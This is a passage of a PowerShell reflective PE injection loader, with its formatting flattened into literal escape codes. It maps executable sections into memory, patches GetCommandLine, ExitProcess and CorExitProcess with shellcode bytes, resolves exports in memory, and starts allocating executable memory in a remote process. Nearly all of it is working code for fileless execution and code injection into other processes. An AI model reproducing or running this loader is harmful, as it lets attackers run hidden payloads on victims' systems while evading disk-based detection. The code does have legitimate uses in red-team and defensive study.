$Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_READWRITE\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_READONLY\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_WRITECOPY\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_NOACCESS\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)\n\t\t{\n\t\t\t$ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE\n\t\t}\n\t\t\n\t\treturn $ProtectionFlag\n\t}\n\n\tFunction Update-MemoryProtectionFlags\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\tfor( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\t[IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)\n\t\t\t\n\t\t\t[UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics\n\t\t\t[UInt32]$SectionSize = $SectionHeader.VirtualSize\n\t\t\t\n\t\t\t[UInt32]$OldProtectFlag = 0\n\t\t\tTest-MemoryRangeValid -DebugString \"Update-MemoryProtectionFlags::VirtualProtect\" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Unable to change memory protection\"\n\t\t\t}\n\t\t}\n\t}\n\t\n\t#This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE\n\t#Returns an object with addresses to copies of the bytes that were overwritten (and the count)\n\tFunction Update-ExeFunctions\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[String]\n\t\t$ExeArguments,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$ExeDoneBytePtr\n\t\t)\n\t\t\n\t\t#This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.\n\t\t$ReturnArray = @() \n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t\n\t\t[IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"Kernel32.dll\")\n\t\tif ($Kernel32Handle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"Kernel32 handle null\"\n\t\t}\n\t\t\n\t\t[IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke(\"KernelBase.dll\")\n\t\tif ($KernelBaseHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"KernelBase handle null\"\n\t\t}\n\n\t\t#################################################\n\t\t#First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.\n\t\t#\tWe overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.\n\t\t$CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t$CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\n\t\t[IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineA\")\n\t\t[IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineW\")\n\n\t\tif ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr\"\n\t\t}\n\n\t\t#Prepare the shellcode\n\t\t[Byte[]]$Shellcode1 = @()\n\t\tif ($PtrSize -eq 8)\n\t\t{\n\t\t\t$Shellcode1 += 0x48\t#64bit shellcode has the 0x48 before the 0xb8\n\t\t}\n\t\t$Shellcode1 += 0xb8\n\t\t\n\t\t[Byte[]]$Shellcode2 = @(0xc3)\n\t\t$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length\n\t\t\n\t\t\n\t\t#Make copy of GetCommandLineA and GetCommandLineW\n\t\t$GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t$GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t$Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null\n\t\t$Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null\n\t\t$ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)\n\t\t$ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)\n\n\t\t#Overwrite GetCommandLineA\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\tif ($Success = $false)\n\t\t{\n\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t}\n\t\t\n\t\t$GetCommandLineAAddrTemp = $GetCommandLineAAddr\n\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)\n\t\t$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize\n\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t\n\t\t$Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t\n\t\t\n\t\t#Overwrite GetCommandLineW\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\tif ($Success = $false)\n\t\t{\n\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t}\n\t\t\n\t\t$GetCommandLineWAddrTemp = $GetCommandLineWAddr\n\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)\n\t\t$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize\n\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t\n\t\t$Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t#################################################\n\t\t\n\t\t\n\t\t#################################################\n\t\t#For C++ stuff that is compiled with visual studio as \"multithreaded DLL\", the above method of overwriting GetCommandLine doesn't work.\n\t\t#\tI don't know why exactly.. But the msvcr DLL that a \"DLL compiled executable\" imports has an export called _acmdln and _wcmdln.\n\t\t#\tIt appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the\n\t\t#\targv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.\n\t\t$DllList = @(\"msvcr70d.dll\", \"msvcr71d.dll\", \"msvcr80d.dll\", \"msvcr90d.dll\", \"msvcr100d.dll\", \"msvcr110d.dll\", \"msvcr70.dll\" `\n\t\t\t, \"msvcr71.dll\", \"msvcr80.dll\", \"msvcr90.dll\", \"msvcr100.dll\", \"msvcr110.dll\")\n\t\t\n\t\tforeach ($Dll in $DllList)\n\t\t{\n\t\t\t[IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)\n\t\t\tif ($DllHandle -ne [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\t[IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_wcmdln\")\n\t\t\t\t[IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_acmdln\")\n\t\t\t\tif ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\t\"Error, couldn't find _wcmdln or _acmdln\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\t\t\t$NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t\t\t\n\t\t\t\t#Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state\n\t\t\t\t$OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])\n\t\t\t\t$OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])\n\t\t\t\t$OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t$OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)\n\t\t\t\t$ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)\n\t\t\t\t$ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\tif ($Success = $false)\n\t\t\t\t{\n\t\t\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t\t\t}\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)\n\t\t\t\t$Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\tif ($Success = $false)\n\t\t\t\t{\n\t\t\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t\t\t}\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)\n\t\t\t\t$Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t}\n\t\t}\n\t\t#################################################\n\t\t\n\t\t\n\t\t#################################################\n\t\t#Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.\n\n\t\t$ReturnArray = @()\n\t\t$ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process\n\t\t\n\t\t#CorExitProcess (compiled in to visual studio c++)\n\t\t[IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke(\"mscoree.dll\")\n\t\tif ($MscoreeHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"mscoree handle null\"\n\t\t}\n\t\t[IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, \"CorExitProcess\")\n\t\tif ($CorExitProcessAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"CorExitProcess address not found\"\n\t\t}\n\t\t$ExitFunctions += $CorExitProcessAddr\n\t\t\n\t\t#ExitProcess (what non-managed programs use)\n\t\t[IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitProcess\")\n\t\tif ($ExitProcessAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"ExitProcess address not found\"\n\t\t}\n\t\t$ExitFunctions += $ExitProcessAddr\n\t\t\n\t\t[UInt32]$OldProtectFlag = 0\n\t\tforeach ($ProcExitFunctionAddr in $ExitFunctions)\n\t\t{\n\t\t\t$ProcExitFunctionAddrTmp = $ProcExitFunctionAddr\n\t\t\t#The following is the shellcode (Shellcode: ExitThread.asm):\n\t\t\t#32bit shellcode\n\t\t\t[Byte[]]$Shellcode1 = @(0xbb)\n\t\t\t[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)\n\t\t\t#64bit shellcode (Shellcode: ExitThread.asm)\n\t\t\tif ($PtrSize -eq 8)\n\t\t\t{\n\t\t\t\t[Byte[]]$Shellcode1 = @(0x48, 0xbb)\n\t\t\t\t[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)\n\t\t\t}\n\t\t\t[Byte[]]$Shellcode3 = @(0xff, 0xd3)\n\t\t\t$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length\n\t\t\t\n\t\t\t[IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitThread\")\n\t\t\tif ($ExitThreadAddr -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"ExitThread address not found\"\n\t\t\t}\n\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to VirtualProtect failed\"\n\t\t\t}\n\t\t\t\n\t\t\t#Make copy of original ExitProcess bytes\n\t\t\t$ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t\t$Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null\n\t\t\t$ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)\n\t\t\t\n\t\t\t#Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then \n\t\t\t#\tcall ExitThread\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp\n\n\t\t\t$Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t}\n\t\t#################################################\n\n\t\tWrite-Output $ReturnArray\n\t}\n\t\n\t\n\t#This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)\n\t#\tIt copies Count bytes from Source to Destination.\n\tFunction Copy-ArrayOfMemAddresses\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Array[]]\n\t\t$CopyInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\n\t\t[UInt32]$OldProtectFlag = 0\n\t\tforeach ($Info in $CopyInfo)\n\t\t{\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to VirtualProtect failed\"\n\t\t\t}\n\t\t\t\n\t\t\t$Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null\n\t\t\t\n\t\t\t$Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t}\n\t}\n\n\n\t#####################################\n\t##########    FUNCTIONS   ###########\n\t#####################################\n\tFunction Get-MemoryProcAddress\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[String]\n\t\t$FunctionName\n\t\t)\n\t\t\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t#Get the export table\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)\n\t\t{\n\t\t\treturn [IntPtr]::Zero\n\t\t}\n\t\t$ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)\n\t\t$ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)\n\t\t\n\t\tfor ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)\n\t\t{\n\t\t\t#AddressOfNames is an array of pointers to strings of the names of the functions exported\n\t\t\t$NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t$NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))\n\t\t\t$Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)\n\n\t\t\tif ($Name -ceq $FunctionName)\n\t\t\t{\n\t\t\t\t#AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions\n\t\t\t\t#    which contains the offset of the function in to the DLL\n\t\t\t\t$OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))\n\t\t\t\t$FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])\n\t\t\t\t$FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t\t$FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])\n\t\t\t\treturn Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)\n\t\t\t}\n\t\t}\n\t\t\n\t\treturn [IntPtr]::Zero\n\t}\n\n\n\tFunction Invoke-MemoryLoadLibrary\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true )]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $false)]\n\t\t[String]\n\t\t$ExeArgs,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle\n\t\t)\n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t#Get Win32 constants and functions\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t\n\t\t$RemoteLoading = $false\n\t\tif (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$RemoteLoading = $true\n\t\t}\n\t\t\n\t\t#Get basic PE information\n\t\tWrite-Verbose \"Getting basic PE information from the file\"\n\t\t$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types\n\t\t$OriginalImageBase = $PEInfo.OriginalImageBase\n\t\t$NXCompatible = $true\n\t\tif (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)\n\t\t{\n\t\t\tWrite-Warning \"PE is not compatible with DEP, might cause issues\" -WarningAction Continue\n\t\t\t$NXCompatible = $false\n\t\t}\n\t\t\n\t\t\n\t\t#Verify that the PE and the current process are the same bits (32bit or 64bit)\n\t\t$Process64Bit = $true\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t\t$Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"IsWow64Process\")\n\t\t\tif ($Result -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit\"\n\t\t\t}\n\t\t\t\n\t\t\t[Bool]$Wow64Process = $false\n\t\t\t$Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to IsWow64Process failed\"\n\t\t\t}\n\t\t\t\n\t\t\tif (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))\n\t\t\t{\n\t\t\t\t$Process64Bit = $false\n\t\t\t}\n\t\t\t\n\t\t\t#PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly\n\t\t\t$PowerShell64Bit = $true\n\t\t\tif ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t{\n\t\t\t\t$PowerShell64Bit = $false\n\t\t\t}\n\t\t\tif ($PowerShell64Bit -ne $Process64Bit)\n\t\t\t{\n\t\t\t\tthrow \"PowerShell must be same architecture (x86/x64) as PE being loaded and remote process\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t{\n\t\t\t\t$Process64Bit = $false\n\t\t\t}\n\t\t}\n\t\tif ($Process64Bit -ne $PEInfo.PE64Bit)\n\t\t{\n\t\t\tThrow \"PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)\"\n\t\t}\n\t\t\n\n\t\t#Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address\n\t\tWrite-Verbose \"Allocating memory for the PE and write its headers to memory\"\n\t\t\n\t\t[IntPtr]$LoadAddr = [IntPtr]::Zero\n\t\tif (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)\n\t\t{\n\t\t\tWrite-Warning \"PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again\" -WarningAction Continue\n\t\t\t[IntPtr]$LoadAddr = $OriginalImageBase\n\t\t}\n\n\t\t$PEHandle = [IntPtr]::Zero\t\t\t\t#This is where the PE is allocated in PowerShell\n\t\t$EffectivePEHandle = [IntPtr]::Zero\t\t#This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t#Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup\n\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t\n\t\t\t#todo, error handling needs to delete this memory if an error happens along the way\n\t\t\t$EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\tif ($EffectivePEHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate 